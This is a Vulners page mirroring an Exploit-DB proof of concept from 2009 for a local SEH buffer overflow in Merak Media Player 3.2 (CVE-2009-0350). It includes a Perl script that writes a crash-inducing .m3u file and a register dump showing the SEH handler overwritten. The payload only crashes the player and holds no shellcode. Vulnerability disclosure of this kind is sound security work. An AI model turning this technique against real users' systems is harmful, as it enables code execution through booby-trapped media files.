Lucene search
+L

Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)

🗓️ 25 Jan 2009 00:00:00Reported by HoussamixType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Merak Media Player V3.2 m3u File Local Buffer Overflow (SEH

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-0350
25 Jan 200900:00
circl
cve
CVE
CVE-2009-0350
29 Jan 200919:00
cve
cvelist
Cvelist
CVE-2009-0350
29 Jan 200919:00
cvelist
exploitdb
Exploit DB
Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (SEH)
2 Mar 200900:00
exploitdb
euvd
EUVD
EUVD-2009-0354
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-0350
29 Jan 200919:30
nvd
prion
Prion
Stack overflow
29 Jan 200919:30
prion
seebug
seebug.org
Merak Media Player .m3u文件处理栈溢出漏洞
13 Feb 200900:00
seebug
#!/usr/bin/perl -w

# Author : Houssamix

# Merak Media Player V3.2  m3u file Local Buffer overflow (SEH)
# Download :  http://www.qwerks.com/download/3748/merak.zip

# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545

# 0013FBE4   42424242  Pointer to next SEH record
# 0013FBE8   45454545  SE handler
# ---------------------------------------------

print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Merak Media Player V3.2  m3u file Local Buffer overflow (SEH) 		 \n";
print "===================================================================== \n";

my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-25]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation